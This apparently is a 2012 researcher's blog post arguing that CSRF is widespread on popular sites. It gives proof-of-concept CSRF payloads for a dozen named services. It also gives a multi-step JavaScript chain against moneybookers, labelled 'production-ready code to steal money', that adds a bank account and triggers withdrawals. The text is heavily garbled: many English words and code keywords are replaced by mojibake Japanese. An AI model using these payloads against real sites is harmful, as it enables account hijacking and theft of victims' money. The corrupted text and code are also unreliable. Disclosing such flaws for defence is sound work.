CSRF examples

Previous discussion on hacker news with ¥È¥ós of critics and Êݼé¼çµÁ.

ȯ¸À¡¿½Ò¤Ù¤ë: ÃÏ°Ì¡¤Ç¤Ì¿¤¹¤ë is published on April 2(but was ¿äÄꤹ¤ë¡¿Í½ÁÛ¤¹¤ëd yesterday) coz Berlin haz no ²òÊü¤¹¤ë¡¿¼«Í³¤Ê wifi ¸¶°ø¡Ê¤È¤Ê¤ë¡Ë I'm not joking and I ¿Íʪ¡¿»Ñ¡¿¿ô»úd out that Sunday is the worst day for ¶ÛµÞ¤Î updates. °æ¸Í¡¿ÊÛ¸î»ÎÀÊ, who cares the date, enjoy:

TL;DR:

I'm trying hard to ¾ÚÌÀ¤¹¤ë my point that À¼ÌÀ "CSRF is only the developers' problem" is not true. I ¶¡µë¤¹¤ëd some examples and I want you to check them out. I really ¹â¤¯É¾²Á¤¹¤ë¡¿¡ÊÁê¾ì¤Ê¤É¤¬¡Ë¾å¤¬¤ë any viewpoint at this problem. Thank you for your attention in Á°¿Ê¤¹¤ë!

Quick overview:

badoo.com

showcase: 

ʸ½ñ.Îá¾õ('<form ³èÆ°¡¿ÀïÆ®="http://badoo.com/ws/anketa-ws.phtml?ws=1" method=ÃÏ°Ì¡¤Ç¤Ì¿¤¹¤ë> <input »Ø̾¤¹¤ë="»Ø̾¤¹¤ë" value="SUUUUP"><input »Ø̾¤¹¤ë="fname" value="SUUUUP"><input »Ø̾¤¹¤ë="sname" value="SUUUUP"><input »Ø̾¤¹¤ë="birth_day" value="28"><input »Ø̾¤¹¤ë="birth_month" value="01"><input »Ø̾¤¹¤ë="section" value="basic"><input »Ø̾¤¹¤ë="birth_year" value="1991"> </form>')

description: 

e.g. changing your profile ¾ÜºÙ¡Ê¤Ë½Ò¤Ù¤ë¡Ës. No Êݸî at all.

github.com

showcase: 

<iframe »Ø̾¤¹¤ë=ifr></iframe>

<script>

ʸ½ñ.Îá¾õ('<form Ū=ifr »Ø̾¤¹¤ë=pwn method=ÃÏ°Ì¡¤Ç¤Ì¿¤¹¤ë ³èÆ°¡¿ÀïÆ®="https://github.com/»ÈÍѼÔs/follow?Ū=homakov"></form>')

pwn.Éþ½¾¤µ¤»¤ë¡¿Äó½Ð¤¹¤ë()

</script>

description: 

makes you follow ³Î¤«¤Ê account without your ³ÎÄê¡¿³Îǧ. Êó¹ð¡Ê¤¹¤ë¡Ë¡¿²±Â¬d few weeks ago and ľ¤¹¡¿Çã¼ý¤¹¤ë¡¤È¬É´Ä¹¤ò¤¹¤ëd. 

slideshare.ÂáÊ᤹¤ë

showcase: 

http://www.slideshare.ÂáÊ᤹¤ë/main/ºï½ü¤¹¤ë/PRESENTATIONID?ajax=¸í¤Ã¤¿&redirect=mypage

http://www.slideshare.ÂáÊ᤹¤ë/ÀÜ¿¨¤¹¤ë/create?contactee=36807343&contacter=0&frm_source=slideview

description: 

ºï½ü¤¹¤ëing £Äè ·Ðͳ¤Ç GET. commenting w/o ³ÎÄê¡¿³Îǧ. GET ¤Ë°ú¤­Â³¤¤¤Æ etc

lockerz.com

showcase: 

ʸ½ñ.Îá¾õ('<form »Ø̾¤¹¤ë=h ³èÆ°¡¿ÀïÆ®="http://lockerz.com/profile/follow/19880685" method=ÃÏ°Ì¡¤Ç¤Ì¿¤¹¤ë></form>'); h.Éþ½¾¤µ¤»¤ë¡¿Äó½Ð¤¹¤ë()

description:

¤Ë°ú¤­Â³¤¤¤Æ w/o ³ÎÄê¡¿³Îǧ

yfrog.com

showcase: 

ʸ½ñ.Îá¾õ('<form ³èÆ°¡¿ÀïÆ®="http://yfrog.com/message/ÃÏ°Ì¡¤Ç¤Ì¿¤¹¤ë.json" »Ø̾¤¹¤ë=h method=ÃÏ°Ì¡¤Ç¤Ì¿¤¹¤ë><input »Ø̾¤¹¤ë="services[]" value="twitter"><input »Ø̾¤¹¤ë="message" value="@yfrog ur pwned"></form>'); ʸ½ñ.h.Éþ½¾¤µ¤»¤ë¡¿Äó½Ð¤¹¤ë();

description: 

¤Ë°ú¤­Â³¤¤¤Æ w/o ³ÎÄê¡¿³Îǧ

ÃÏ°Ì¡¤Ç¤Ì¿¤¹¤ëing w/o ³ÎÄê¡¿³Îǧ

°æ¸Í¡¿ÊÛ¸î»ÎÀÊ, just anything. Êó¹ð¡Ê¤¹¤ë¡Ë¡¿²±Â¬d / ľ¤¹¡¿Çã¼ý¤¹¤ë¡¤È¬É´Ä¹¤ò¤¹¤ëd.

kinopoisk.ru

showcase: http://www.kinopoisk.ru/Åêɼ¡Ê¤¹¤ë¡Ë.php?film=FILM_ID&film_vote=VOTE_FROM_1_TO_10

description: GET request in an image, for example, will »Ï¤á¤ë¡¤·è¤á¤ë highest Ψing for some trash-movie on ¤ËÂå¤ï¤Ã¤Æ of your account.

I lol'd when ÀßΩ¤¹¤ë this vulnerability. Movies' ratings is the ³Ë¿´ feature of kinopoisk(It is like ¥í¥·¥¢¤Î IMDB), ¾ì½ê¡¿°ÌÃÖ has enormous number of ˬÌä¼Ôs and now we realize that all ratings there ²ÁÃ͡ʤ¬¤¢¤ë¡Ë nothing :(

formspring.com

showcase: Ê¸½ñ.Îá¾õ('<form ³èÆ°¡¿ÀïÆ®="http://www.formspring.me/follow/Äɲ乤ë/WHO_TO_FOLLOW" method=ÃÏ°Ì¡¤Ç¤Ì¿¤¹¤ë><input »Ø̾¤¹¤ë=public value=1><input »Ø̾¤¹¤ë=ajax value=1></form>')

description: ¤ä¤á¤ë ´ð½à ·ê¤ò³«¤±¤ë - Ê¿°×¤Ê way to ¿­¤Ó¡Ê¤ë¡Ë thousands of ¿®Êô¼Ôs :D

odesk.com

showcase: 

mycb=µ¡Ç½¡Ê¤¹¤ë¡Ë¡¿¹Ô»ö(){console.¥¹¥Ô¡¼¥É¤ò½Ð¤¹¡¿µ­Ï¿¤Ë¤Ä¤±¤ë(arguments);}

ʸ½ñ.Îá¾õ('<script src="https://www.odesk.com/api/hr/v1/flagging.json?flagged_item=»ÈÍѼÔ&flagged_item_id=1&func=getFlagList&group_id=1&callback=mycb"></script>');

description: 

this vulnerability deserves separated ÃÏ°Ì¡¤Ç¤Ì¿¤¹¤ë. In general: JSONP should be used very carefully. And, yeah, CSRF ¹¶·â¤ò¼õ¤±¤ä¤¹¤¤. It's getting boring.

dailymotion.com

showcase: http://www.dailymotion.com/pageitem/»ÈÍѼÔ/subscribe?request=USERNAME&method=toggleSubscribe

description: subscribing ·Ðͳ¤Ç GET..

vimeo.com

showcase: https://player.vimeo.com/like/ID?callback=cb&status=1

https://player.vimeo.com/watch_later/ID?callback=cb&status=1

description: Äɲ乤ëing to watchlist, liking and other stuff..

about.me

showcase: Ê¸½ñ.Îá¾õ('<form method=ÃÏ°Ì¡¤Ç¤Ì¿¤¹¤ë »Ø̾¤¹¤ë=h ³èÆ°¡¿ÀïÆ®="http://about.me/ajax"><input »Ø̾¤¹¤ë="profile_text_content" value="YOBA ETO TY"><input »Ø̾¤¹¤ë=call value=save></form>')

description: Typical, CSRF ¹¶·â¤ò¼õ¤±¤ä¤¹¤¤ service. Should I continue? You can change any field in »ÈÍѼÔ's profile :(

bitbucket.org

showcase: GET to https://bitbucket.org/USERNAME/follow

description: ¤Ë°ú¤­Â³¤¤¤Æ. 

posterous.com

showcase: Ê¸½ñ.Îá¾õ('<form ³èÆ°¡¿ÀïÆ®="http://posterous.com/api/2/¾ì½ê¡¿°ÌÃÖs/1314005/subscribe" method=ÃÏ°Ì¡¤Ç¤Ì¿¤¹¤ë><input »Ø̾¤¹¤ë=_method value=put></form>')

http://homakov.posterous.com/likes/create?like_type=ÃÏ°Ì¡¤Ç¤Ì¿¤¹¤ë&post_id=10132110

description: 

liking, subscribing.

hulu.com

showcase: Ê¸½ñ.Îá¾õ('<form ³èÆ°¡¿ÀïÆ®="http://www.hulu.com/¥Ó¥Ç¥ªs/Åêɼ¡Ê¤¹¤ë¡Ë/344578" method=ÃÏ°Ì¡¤Ç¤Ì¿¤¹¤ë><input »Ø̾¤¹¤ë=up value=5><input »Ø̾¤¹¤ë=_ value=""></form>')

http://www.hulu.com/shows/subscribe/344578?type=episodes,clips&first_run_only=0

description: 

Åêɼ¡Ê¤¹¤ë¡Ëing w/o ³ÎÄê¡¿³Îǧ(like kinopoisk example), subscribing to new episodes..

moneybookers.com

showcase(À¸»º¡¿»ºÊª-ready code to steal money): 

ʸ½ñ.Îá¾õ('<iframe width="100%" ¹â¤µ="100%" »Ø̾¤¹¤ë="h" src="https://www.moneybookers.com/app/add_bank2.pl?from=manage_banks"></iframe>')

ʸ½ñ.Îá¾õ('<form »Ø̾¤¹¤ë=step1 Ū=h ³èÆ°¡¿ÀïÆ®="https://www.moneybookers.com/app/add_bank2.pl?from=manage_banks" method=ÃÏ°Ì¡¤Ç¤Ì¿¤¹¤ë><input »Ø̾¤¹¤ë=³èÆ°¡¿ÀïÆ® value=search><input »Ø̾¤¹¤ë=country value=RUS><input »Ø̾¤¹¤ë=swift value=PRTBRUMM><input type=Éþ½¾¤µ¤»¤ë¡¿Äó½Ð¤¹¤ë></form>')

ʸ½ñ.Îá¾õ('<form »Ø̾¤¹¤ë=step2 Ū=h ³èÆ°¡¿ÀïÆ®="https://www.moneybookers.com/app/add_bank2.pl?from=manage_banks" method=ÃÏ°Ì¡¤Ç¤Ì¿¤¹¤ë><input »Ø̾¤¹¤ë=³èÆ°¡¿ÀïÆ® value=Äɲ乤ë><input »Ø̾¤¹¤ë=country value=RUS><input »Ø̾¤¹¤ë=bank_id value=0><input »Ø̾¤¹¤ë=account_no value=123234123234><input type=Éþ½¾¤µ¤»¤ë¡¿Äó½Ð¤¹¤ë></form>')

get_bank_id=µ¡Ç½¡Ê¤¹¤ë¡Ë¡¿¹Ô»ö(){

  //it's mock, ÌϤ¤Î ¼ê³¤­. Getting ºÇ¿·¤Î ºÇ½é¤Î¡¿¼çÍ×¤Ê ½ÅÍ×¤Ê of just created bank account isn't difficult. But ȼ¤¦¡¿´Ø¤ï¤ës some server Ì£Êý¤¹¤ë interaction. I won't give out this code, sorry.

  return 123234345; //ºÇ½é¤Î¡¿¼çÍ×¤Ê ½ÅÍ×¤Ê of fresh created bank account in µ¾À·¼Ô's profile

}

how_much = µ¡Ç½¡Ê¤¹¤ë¡Ë¡¿¹Ô»ö(time){

  //we will repeat ¿È¤ò°ú¤¯ request with lower ÎÌ every time - so we could ¿È¤ò°ú¤¯ as much as possible

  return [5000, 3000, 1000, 500, 150, 100][time]

}

ʸ½ñ.Îá¾õ('<form »Ø̾¤¹¤ë=step3 Ū=h ³èÆ°¡¿ÀïÆ®="https://www.moneybookers.com/app/download.pl" method=ÃÏ°Ì¡¤Ç¤Ì¿¤¹¤ë><input »Ø̾¤¹¤ë=ÃÏ°Ì¡¤Ç¤Ì¿¤¹¤ëd value=³Îǧ¤¹¤ë><input »Ø̾¤¹¤ë=ÌÜŪÃÏ value=BWI><input »Ø̾¤¹¤ë=bankwire_account value='+get_bank_id()+'><input »Ø̾¤¹¤ë=txtAmount value='+how_much(0)+'><input type=Éþ½¾¤µ¤»¤ë¡¿Äó½Ð¤¹¤ë></form>')

//this form ´Þ¤à¡¿Éõ¤¸¹þ¤á¤ës my birthday. it's not difficult to find out anybody's birthday either.

ʸ½ñ.Îá¾õ('<form »Ø̾¤¹¤ë=step4 Ū=h ³èÆ°¡¿ÀïÆ®="https://www.moneybookers.com/app/download.pl" method=ÃÏ°Ì¡¤Ç¤Ì¿¤¹¤ë><input »Ø̾¤¹¤ë=ÃÏ°Ì¡¤Ç¤Ì¿¤¹¤ëd value=¿ë¹Ô¤¹¤ë¡¿È¯¸ú¤µ¤»¤ë><input »Ø̾¤¹¤ë=dob_day value=28><input »Ø̾¤¹¤ë=dob_month value=04><input »Ø̾¤¹¤ë=dob_year value=1993><input type=Éþ½¾¤µ¤»¤ë¡¿Äó½Ð¤¹¤ë></form>')

setTimeout(µ¡Ç½¡Ê¤¹¤ë¡Ë¡¿¹Ô»ö(){

  step1.Éþ½¾¤µ¤»¤ë¡¿Äó½Ð¤¹¤ë()

},1000);

setTimeout(µ¡Ç½¡Ê¤¹¤ë¡Ë¡¿¹Ô»ö(){

  step2.Éþ½¾¤µ¤»¤ë¡¿Äó½Ð¤¹¤ë()

},2000);

setTimeout(µ¡Ç½¡Ê¤¹¤ë¡Ë¡¿¹Ô»ö(){

  step3.Éþ½¾¤µ¤»¤ë¡¿Äó½Ð¤¹¤ë();

},3000)

setTimeout(µ¡Ç½¡Ê¤¹¤ë¡Ë¡¿¹Ô»ö(){

  step4.Éþ½¾¤µ¤»¤ë¡¿Äó½Ð¤¹¤ë();

},4000)

description: 

It's the best showcase IMO. This one is "À¸»º¡¿»ºÊª ready" and I have tried it to ¿È¤ò°ú¤¯ money on myself from my own account and it worked. Êó¹ð¡Ê¤¹¤ë¡Ë¡¿²±Â¬d and ľ¤¹¡¿Çã¼ý¤¹¤ë¡¤È¬É´Ä¹¤ò¤¹¤ëd. This example illustrates the whole point of the ÃÏ°Ì¡¤Ç¤Ì¿¤¹¤ë. It's ¤ä¤á¤ë boring to explain the same looking vulnerabilites - remember, if you can do ·³Ââ people to follow without ³ÎÄê¡¿³Îǧ you(most likely) can do the same with his money. Think about it.

ľÌ̤¹¤ë it.

°æ¸Í¡¿ÊÛ¸î»ÎÀÊ, these showcases are the tiny part of ¹¶·â¤ò¼õ¤±¤ä¤¹¤¤ POPULAR(I don't even ¤Ë¤Ä¤¤¤Æ¸ÀµÚ¤¹¤ë middle and small websites. they're just doomed...) ¾ì½ê¡¿°ÌÃÖs at the moment. 

I'm ¤ä¤á¤ë exhausted to Ä´ºº¤¹¤ë it - approx. 50-70% of what I try have ·ê¤ò³«¤±¤ës/bugs and I'm talking about Alexa ºÇ¹â¤Î¡¤¤ò±Û¤¹ ¾ì½ê¡¿°ÌÃÖs(lol!). And it would be unbelievebly ÊúÍʤ¹¤ë ÃÏ°Ì¡¤Ç¤Ì¿¤¹¤ë if I ´Þ¤à them all. bit more: 

pinterest.com, GET let's u wipe bio and website info

dnsimple.com, you can Äɲ乤ë services to »ÈÍѼÔ's domain ·Ðͳ¤Ç GET

disqus.com(let's me comment any ÃÏ°Ì¡¤Ç¤Ì¿¤¹¤ë on ¤ËÂå¤ï¤Ã¤Æ of your account; ¤ä¤á¤ë Íø±×¡¿¶½Ì£ing Àڤ곫¤¯¡¿¥¿¥¯¥·¡¼¡¿ÉÔÀµ¥¢¥¯¥»¥¹ here, subtle trick-·ê¤ò³«¤±¤ë with Webkit engine, stay tuned!), 

translate.ru(Ê¿°×¤Ê to steal cookies and account; it's bad idea to Ééô 3rd parties JS in iframe with your ʸ½ñ.domain. probably will publish more ¡Ê·Ù»¡¤Ê¤É¤Ø¤Î¡ËÌ©¹ð¡¤¹ðÁʡʾõ¡Ë on iframe's domain  sameOriginPolicy later, must-read topic), 

heroku.com(°æ¸Í¡¿ÊÛ¸î»ÎÀÊ, ¹ÔÀ¯ can be done ·Ðͳ¤Ç GET - smth like this: <img src=xxx/update?site_name[»Ø̾¤¹¤ë]=yyy> will ²þ̾¤¹¤ë your xxx.herokuapp.com to yyy.herokuapp.com) 

Ä´½ñ¤ò¤È¤ë¡¿Í½Ì󤹤ëing.com(¹¶·â¤ò¼õ¤±¤ä¤¹¤¤. I had an idea to Äɲ乤ë Saransk city to your "Favorite places" but changed my mind. It would be funny though.)

etc I forgot few.

Also, most of showcases here are not ÈãȽŪ¤Ê for only one ¿äÏÀ¤¹¤ë¡¿Íýͳ - ·ºÌ³½ê¡¤¹´ÃÖ½ê is not cozy for living, in my opinion. In fact, and that's obvious, if you find ³Î¤«¤Ê type of vulnerability you can use it both ways e.g. »Ï¤á¤ë¡¤·è¤á¤ë up 3012 as date of ÃÏ°Ì¡¤Ç¤Ì¿¤¹¤ë OR Äɲ乤ë your public ½ÅÍ×¤Ê to µ¾À·¼Ô's repo, you know what I'm talking about. Check your codebase.

Guys from HN disappoint me with their Êݼé¼çµÁ. It's ¤ä¤á¤ë Ê¿°×¤Ê to repeat "It ºîÉÊ È³¶â, Google and Mozilla have best programmers, °æ¸Í¡¿ÊÛ¸î»ÎÀÊ known attack, popular ¾ì½ê¡¿°ÌÃÖs are Êݸ¤ëd(ORLY?!), go home kid".

That was an ¿äÄꤹ¤ë¡¿Í½ÁÛ¤¹¤ëd ¹Ô°Ù, so I hope, this ÃÏ°Ì¡¤Ç¤Ì¿¤¹¤ë makes them to ľÌ̤¹¤ë facts. 2+2=4 and CSRF = the ÊúÍʤ¹¤ë, wide-spreaded problem that should be solved now or never. 

°æ¸Í¡¿ÊÛ¸î»ÎÀÊ, no »öÊÁ who's vulnerability it is. I don't care anymore: Browsers, apps, programmers, ´ð½às. There is 1 fact - lots of ¾ì½ê¡¿°ÌÃÖs in the Internet are ¹¶·â¤ò¼õ¤±¤ä¤¹¤¤(in 2012, after 11 years). That's all I want to explain and discuss with you.

I made the point - you ľ¤¹¡¿Çã¼ý¤¹¤ë¡¤È¬É´Ä¹¤ò¤¹¤ë in up-to-you way. ľ¤¹¡¿Çã¼ý¤¹¤ë¡¤È¬É´Ä¹¤ò¤¹¤ë. But, Ψľ¤Ë, making small ·Ù¹ð-˸¤²¤ë¡¿Ë¡ÄÊÛ¸î»Î¶È in browsers seems more sane than teaching every Áª¤Ó½Ð¤¹¡¿ÆÈ¿È programmer from newbie to ¾åµé¤Î CSRF Êݸî and ±øÀ÷¤¹¤ëing every HTTP POST request with µ­Ç°ÉÊ.